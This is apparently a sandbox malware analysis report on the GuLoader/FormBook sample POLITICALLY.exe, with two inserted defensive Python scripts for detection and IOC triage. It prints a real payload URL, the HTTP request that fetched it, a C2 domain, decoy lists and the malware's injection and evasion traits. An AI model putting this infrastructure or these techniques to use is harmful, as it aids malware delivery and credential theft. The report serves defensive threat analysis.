Analysis Report POLITICALLY.exe

Overview

General Information

Sample Name: POLITICALLY.exe
Analysis ID: 411376
MD5: 80b3365808440838596864bd6d492c02
SHA1: ea14e621d263a3754234a65bc76cff61bf9eceab
SHA256: 8d6f73da5150cd26789a9a0e0643f69b520306680523d91cb21438ad2e6fa80c
Tags: exe

Detection

FormBook GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Potential malicious icon found
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

Found malware configuration
Source: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "http://111.90.149.46/bin_XNLhDlJvG218.bin"}
Source: 00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.nortier.cloud/olg8/"], "decoy": ["onlinewomensclasses.com", "wiseowldigital.com", "morgolf.com", "bytriciacreations.com", "pamelaron.com", "ratilhabibullah.com", "productstoredt.com", "moopyo.com", "sundrygroup.com", "omenghafoods.online", "rentozo.com", "soakstress.xyz", "cunerier.com", "healthyandfestiveme.com", "paapfly.com", "seawincars.com", "trainsecure.com", "gobabybell.com", "oceanstaruae.com", "hhgrreg.com", "alohaarizonamassage.com", "policomercial.com", "polarishut.com", "takecontrol.house", "diamdima.com", "sullivandecarli.com", "6923599.com", "happinessisselfish.com", "excaliburbooks.com", "shabestantv.com", "mayer.show", "amydawkins.net", "bellymuse.com", "symmetricgym.info", "usatowservice.com", "emergeunbrken.network", "hifipromotion.com", "femboyshooters.com", "kvtlegal.net", "teamforce.pro", "drcconsultancy.com", "blvckgirls.com", "purplebean.company", "donedispute.com", "herbcart.site", "auroraleathers.com", "elefante8.com", "bdsmharness.com", "consulenzaweb.com", "onewtaxfree.com", "go-master.com", "tuancai.net", "importadoralosangeles.com", "mexueer.com", "easiersell.com", "mifeng6.info", "dgjrdk.com", "assroyalty.club", "healyagency.com", "thebridgestreetgallery.com", "artboxxstudio.com", "movingswap.com", "inovus-park.com", "prismatiq.tech"]}
Multi AV Scanner detection for submitted file
Source: POLITICALLY.exe Virustotal: Detection: 17%
Source: POLITICALLY.exe ReversingLabs: Detection: 17%
Yara detected FormBook
Source: Yara match File source: 00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.559281300.000000001DFE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.545510217.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, type: MEMORY
Antivirus or Machine Learning detection for unpacked file
Source: 23.2.control.exe.4fb518.1.unpack Avira: Label: TR/Dropper.Gen
Source: 23.2.control.exe.4d37960.4.unpack Avira: Label: TR/Dropper.Gen

Compliance:

Uses 32bit PE files
Source: POLITICALLY.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000013.00000000.532024048.000000000DC20000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: POLITICALLY.exe, 0000000A.00000002.560170779.000000001E32F000.00000040.00000001.sdmp, control.exe, 00000017.00000002.593834522.000000000491F000.00000040.00000001.sdmp
Source: Binary string: control.pdb source: POLITICALLY.exe, 0000000A.00000003.543429880.00000000008E3000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: POLITICALLY.exe, control.exe
Source: Binary string: control.pdbUGP source: POLITICALLY.exe, 0000000A.00000003.543429880.00000000008E3000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000013.00000000.532024048.000000000DC20000.00000002.00000001.sdmp

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\control.exe Code function: 4x nop then pop edi 23_2_030AC3ED
Source: C:\Windows\SysWOW64\control.exe Code function: 4x nop then pop ebx 23_2_030A6A95
Source: C:\Windows\SysWOW64\control.exe Code function: 4x nop then pop edi 23_2_030B565E

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.2.6:49744 -> 111.90.149.46:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.nortier.cloud/olg8/
Source: Malware configuration extractor URLs: http://111.90.149.46/bin_XNLhDlJvG218.bin
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SHINJIRU-MY-AS-AP Shinjiru Technology Sdn Bhd, MY
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected:
  GET /bin_XNLhDlJvG218.bin HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
  Host: 111.90.149.46
  Cache-Control: no-cache
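The Snort hit above and the GET request it fired on share one shape: a raw .bin fetched from a literal IP (so no DNS query precedes the connection) with a browser User-Agent that no browser would use for such a fetch. The Python below is an added example, not part of the Joe Sandbox report; it re-implements that heuristic over a few constructed key=value proxy-log lines. The log format, the field names and the ts=4 and ts=5 lines are assumptions made for the example; only the ts=3 line mirrors the request the sandbox recorded.

```python
import re
from ipaddress import ip_address

# Constructed proxy log (key=value, quoted where the value has spaces). Only the
# ts=3 line reproduces the request from the report; ts=4 and ts=5 are assumed
# benign/borderline traffic added to show the heuristic's boundaries.
HTTP_LOG = """\
ts=3 src=192.168.2.6 dst=111.90.149.46 method=GET host=111.90.149.46 uri=/bin_XNLhDlJvG218.bin ua="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
ts=4 src=192.168.2.6 dst=203.0.113.20 method=GET host=www.example.com uri=/index.html ua="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
ts=5 src=192.168.2.6 dst=203.0.113.7 method=GET host=203.0.113.7 uri=/update.json ua="curl/7.68.0"
"""

KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
BROWSER_UA_RE = re.compile(r"^Mozilla/\d\.\d .*\b(Trident|Gecko|Chrome|Safari)\b")


def parse_kv(line):
    """Parse one key=value log line into a dict; quoted values may contain spaces."""
    return {k: quoted or bare for k, quoted, bare in KV_RE.findall(line)}


def is_dotted_quad(host):
    """True when the Host header is a literal IP address, i.e. no name was resolved."""
    try:
        ip_address(host.strip("[]"))
    except ValueError:
        return False
    return True


def classify(ev):
    """Return (severity, reasons) for one HTTP event, or (None, []) when nothing fires."""
    host = ev.get("host", "")
    uri = ev.get("uri", "")
    reasons = []
    dotted = is_dotted_quad(host)
    bin_from_ip = dotted and uri.lower().endswith(".bin")
    if dotted:
        reasons.append("Host header is a literal IP (no DNS query precedes the connection)")
    if bin_from_ip:
        reasons.append("raw .bin download from dotted quad (same logic as ET TROJAN 2018752)")
    if dotted and BROWSER_UA_RE.match(ev.get("ua", "")):
        reasons.append("browser User-Agent on a fetch no browser would issue")
    if not reasons:
        return None, []
    return ("high" if bin_from_ip else "low"), reasons


def detect(http_log):
    """Run the heuristic over every log line and return the alerts in log order."""
    alerts = []
    for line in http_log.splitlines():
        if not line.strip():
            continue
        ev = parse_kv(line)
        severity, reasons = classify(ev)
        if severity:
            alerts.append({"ts": ev["ts"], "src": ev["src"], "dst": ev["dst"],
                           "severity": severity, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in detect(HTTP_LOG):
        print(f'ts={a["ts"]} {a["src"]} -> {a["dst"]} [{a["severity"]}]')
        for r in a["reasons"]:
            print("   -", r)
```

The ts=5 line is kept at low severity on purpose: a literal-IP Host header alone is common for internal tooling, and the fidelity comes from combining it with the .bin extension, which is why the ET rule keys on both. The User-Agent check exists only to show that a UA allowlist would have let this request through.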
Source: unknown TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: POLITICALLY.exe, 0000000A.00000002.547813821.00000000008B9000.00000004.00000020.sdmp String found in binary or memory: http://111.90.149.46/bin_XNLhDlJvG218.bin
Source: POLITICALLY.exe, 0000000A.00000002.547813821.00000000008B9000.00000004.00000020.sdmp String found in binary or memory: http://111.90.149.46/bin_XNLhDlJvG218.bin/
Source: POLITICALLY.exe, 0000000A.00000002.547813821.00000000008B9000.00000004.00000020.sdmp String found in binary or memory: http://111.90.149.46/bin_XNLhDlJvG218.bin3
Source: POLITICALLY.exe, 0000000A.00000002.547813821.00000000008B9000.00000004.00000020.sdmp String found in binary or memory: http://111.90.149.46/bin_XNLhDlJvG218.binb)
Source: POLITICALLY.exe, 0000000A.00000002.547813821.00000000008B9000.00000004.00000020.sdmp String found in binary or memory: http://111.90.149.46/bin_XNLhDlJvG218.binw
Source: POLITICALLY.exe, 0000000A.00000002.547813821.00000000008B9000.00000004.00000020.sdmp String found in binary or memory: http://111.90.149.46/in_XNLhDlJvG218.bin
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.6923599.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.6923599.com/olg8/
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.6923599.com/olg8/www.wiseowldigital.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.6923599.comReferer:
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.artboxxstudio.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.artboxxstudio.com/olg8/
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.artboxxstudio.com/olg8/www.onlinewomensclasses.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.artboxxstudio.comReferer:
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.assroyalty.club
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.assroyalty.club/olg8/
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.assroyalty.club/olg8/www.tuancai.net
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.assroyalty.clubReferer:
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.auroraleathers.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.auroraleathers.com/olg8/
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.auroraleathers.com/olg8/www.artboxxstudio.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.auroraleathers.comReferer:
Source: explorer.exe, 00000013.00000000.507594698.000000000095C000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.cunerier.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.cunerier.com/olg8/
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.cunerier.com/olg8/www.purplebean.company
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.cunerier.comReferer:
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.easiersell.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.easiersell.com/olg8/
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.easiersell.com/olg8/www.assroyalty.club
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.easiersell.comReferer:
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.moopyo.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.moopyo.com/olg8/
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.moopyo.com/olg8/www.morgolf.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.moopyo.comReferer:
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.morgolf.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.morgolf.com/olg8/
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.morgolf.com/olg8/www.easiersell.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.morgolf.comReferer:
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.nortier.cloud
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.nortier.cloud/olg8/
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.nortier.cloudReferer:
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.onlinewomensclasses.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.onlinewomensclasses.com/olg8/
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.onlinewomensclasses.com/olg8/www.policomercial.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.onlinewomensclasses.comReferer:
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.policomercial.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.policomercial.com/olg8/
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.policomercial.com/olg8/www.6923599.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.policomercial.comReferer:
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.prismatiq.tech
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.prismatiq.tech/olg8/
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.prismatiq.tech/olg8/www.soakstress.xyz
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.prismatiq.techReferer:
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.purplebean.company
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.purplebean.company/olg8/
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.purplebean.company/olg8/www.nortier.cloud
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.purplebean.companyReferer:
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.soakstress.xyz
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.soakstress.xyz/olg8/
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.soakstress.xyz/olg8/www.moopyo.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.soakstress.xyzReferer:
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.tuancai.net
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.tuancai.net/olg8/
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.tuancai.net/olg8/www.auroraleathers.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.tuancai.netReferer:
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.wiseowldigital.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.wiseowldigital.com/olg8/
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.wiseowldigital.com/olg8/www.cunerier.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.wiseowldigital.comReferer:
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
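The two extracted configurations at the top of the report (the GuLoader payload URL and the FormBook C2 list with its 64 decoy domains) and the "http://www.<domain>/olg8/" strings found in explorer.exe memory above are the same data seen twice: FormBook builds every candidate URL from the campaign path "/olg8/" and contacts decoys alongside the real C2, and adjacent strings in the memory dump run together, which is why some hits carry a trailing "Referer:" or the next host name. The Python below is an added example, not part of the report or of any extractor; it turns both configurations into a typed indicator set, classifies a constructed sample of the memory strings against it, and derives a high-confidence blocklist. Both configurations are copied from the report; the six MEMORY_STRINGS entries are a hand-picked subset of the hits listed above.

```python
import re
from collections import Counter
from urllib.parse import urlsplit

# Copied from the report's extractor output (GuLoader from process 2, FormBook from process 23).
GULOADER_CFG = {"Payload URL": "http://111.90.149.46/bin_XNLhDlJvG218.bin"}
FORMBOOK_CFG = {
    "C2 list": ["www.nortier.cloud/olg8/"],
    "decoy": [
        "onlinewomensclasses.com", "wiseowldigital.com", "morgolf.com", "bytriciacreations.com",
        "pamelaron.com", "ratilhabibullah.com", "productstoredt.com", "moopyo.com", "sundrygroup.com",
        "omenghafoods.online", "rentozo.com", "soakstress.xyz", "cunerier.com", "healthyandfestiveme.com",
        "paapfly.com", "seawincars.com", "trainsecure.com", "gobabybell.com", "oceanstaruae.com",
        "hhgrreg.com", "alohaarizonamassage.com", "policomercial.com", "polarishut.com", "takecontrol.house",
        "diamdima.com", "sullivandecarli.com", "6923599.com", "happinessisselfish.com", "excaliburbooks.com",
        "shabestantv.com", "mayer.show", "amydawkins.net", "bellymuse.com", "symmetricgym.info",
        "usatowservice.com", "emergeunbrken.network", "hifipromotion.com", "femboyshooters.com",
        "kvtlegal.net", "teamforce.pro", "drcconsultancy.com", "blvckgirls.com", "purplebean.company",
        "donedispute.com", "herbcart.site", "auroraleathers.com", "elefante8.com", "bdsmharness.com",
        "consulenzaweb.com", "onewtaxfree.com", "go-master.com", "tuancai.net", "importadoralosangeles.com",
        "mexueer.com", "easiersell.com", "mifeng6.info", "dgjrdk.com", "assroyalty.club", "healyagency.com",
        "thebridgestreetgallery.com", "artboxxstudio.com", "movingswap.com", "inovus-park.com", "prismatiq.tech",
    ],
}

# Subset of the "String found in binary or memory" hits from explorer.exe (process 19),
# chosen to cover the real C2, a decoy, run-together residue and unrelated font strings.
MEMORY_STRINGS = [
    "http://www.nortier.cloud/olg8/",
    "http://www.nortier.cloudReferer:",
    "http://www.6923599.com/olg8/",
    "http://www.artboxxstudio.com/olg8/www.onlinewomensclasses.com",
    "http://www.fontbureau.com/designers",
    "http://www.autoitscript.com/autoit3/J",
]

URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)(/\S*)?", re.IGNORECASE)


def norm_host(host):
    """Lower-case a host and drop the leading www. so config and memory forms compare equal."""
    host = host.lower().rstrip(".")
    return host[4:] if host.startswith("www.") else host


def iocs_from_configs():
    """Return ({host: kind}, campaign_path) built from both extracted configurations."""
    iocs = {norm_host(urlsplit(GULOADER_CFG["Payload URL"]).hostname): "guloader_payload"}
    campaign_path = None
    for entry in FORMBOOK_CFG["C2 list"]:
        parts = urlsplit("http://" + entry)
        iocs[norm_host(parts.hostname)] = "formbook_c2"
        campaign_path = parts.path          # "/olg8/" is shared by every URL this build generates
    for d in FORMBOOK_CFG["decoy"]:
        iocs.setdefault(norm_host(d), "formbook_decoy")
    return iocs, campaign_path


def classify(raw, iocs, campaign_path):
    """Classify one memory string as (kind, matched_host, campaign_path_seen)."""
    m = URL_RE.match(raw)
    if not m:
        return "not_a_url", None, False
    token = norm_host(m.group(1))
    path = m.group(2) or ""
    # Longest known host that prefixes the token: absorbs residue such as "nortier.cloudReferer".
    best = max((h for h in iocs if token.startswith(h)), key=len, default=None)
    if best is None:
        return "unrelated", token, False
    return iocs[best], best, bool(campaign_path) and path.startswith(campaign_path)


def triage(strings=MEMORY_STRINGS):
    """Classify every string; rows are (raw, kind, host, campaign_path_seen)."""
    iocs, campaign_path = iocs_from_configs()
    return [(s,) + classify(s, iocs, campaign_path) for s in strings]


def blocklist():
    """Only the loader host and the real C2: decoys are ordinary third-party sites the bot
    contacts to hide the C2 among them, so blocking them mostly produces noise."""
    iocs, _ = iocs_from_configs()
    return sorted(h for h, kind in iocs.items() if kind in ("guloader_payload", "formbook_c2"))


if __name__ == "__main__":
    rows = triage()
    print(Counter(kind for _, kind, _, _ in rows))
    print("block:", blocklist())
```

The prefix match is deliberately loose because memory-string extraction has no delimiters; on real dump output, treat a prefix hit as a lead to confirm against the surrounding bytes rather than as a final classification. Decoy hits are still worth keeping as low-confidence context: a host that appears both in the FormBook config and in a proxy log with the campaign path is strong evidence of the same build, even though the domain itself is not malicious.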

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.559281300.000000001DFE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.545510217.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.559281300.000000001DFE0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.559281300.000000001DFE0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.545510217.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.545510217.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Potential malicious icon found
Source: initial sample Icon embedded in PE file: bad icon match: 20047c7c70f0e004
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\POLITICALLY.exe Process Stats: CPU usage > 98%
Contains functionality to call native functions
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0222E459 NtProtectVirtualMemory, 2_2_0222E459
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0222EB73 NtMapViewOfSection, 2_2_0222EB73
